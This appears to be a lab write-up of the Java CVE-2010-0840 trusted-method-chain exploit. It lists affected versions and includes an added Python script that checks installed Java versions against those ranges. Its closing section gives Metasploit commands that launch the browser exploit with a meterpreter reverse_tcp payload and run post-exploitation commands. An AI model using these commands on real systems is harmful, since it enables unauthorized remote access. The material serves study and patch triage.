CVE-2010-0840 : Java Statement.invoke Trusted Method Chain Exploit

Timeline :

Vulnerability reported to Oracle by ZDI on 2009-11-24
Coordinated public release of advisory on 2010-04-05
Metasploit PoC provided by hdm on 2010-08-20

    PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-0840
ZDI-10-056

    Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

    Tested on Windows XP SP3 with :

Java 6 Standard Edition Update 18

    Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
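
A defender-side check for the affected ranges listed above, as an added example that is not part of the original page or the Metasploit module: it parses legacy `java -version` strings and flags Java 5 and 6 builds below the fixed updates. The inventory lines and host names are constructed, and the function names are illustrative.

```python
import re

# First fixed update per Java SE major version, as stated on this page.
FIRST_FIXED_UPDATE = {5: 23, 6: 19}

# Matches the legacy "1.<major>.<minor>[_<update>]" scheme printed by `java -version`.
_VERSION_RE = re.compile(r'\b1\.(\d+)\.(\d+)(?:_(\d+))?')

def parse_java_version(text):
    """Return (major, update) from a version string or banner, or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major = int(m.group(1))
    # A GA build such as "1.6.0" carries no update suffix: treat it as update 0.
    update = int(m.group(3)) if m.group(3) else 0
    return major, update

def is_affected(text):
    """True/False for Java 5 and 6; None when the string cannot be parsed
    or belongs to a release line this page does not list."""
    parsed = parse_java_version(text)
    if parsed is None:
        return None
    major, update = parsed
    fixed = FIRST_FIXED_UPDATE.get(major)
    if fixed is None:
        return None
    return update < fixed

# Constructed inventory lines (host names are made up for illustration).
SAMPLE_INVENTORY = [
    ("ws-01", 'java version "1.6.0_18"'),
    ("ws-02", 'java version "1.6.0_19"'),
    ("ws-03", 'java version "1.5.0_22"'),
    ("ws-04", 'java version "1.5.0_23"'),
    ("ws-05", 'java version "1.6.0"'),
    ("ws-06", 'java version "1.4.2_19"'),
]

def triage(inventory):
    """Map each host to 'affected', 'fixed' or 'unknown'."""
    labels = {True: "affected", False: "fixed", None: "unknown"}
    return {host: labels[is_affected(banner)] for host, banner in inventory}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```

Hosts reported as "unknown" run a release line the page does not cover and need a separate check against the vendor advisory.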

    Commands :

use multi/browser/java_trusted_chain
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig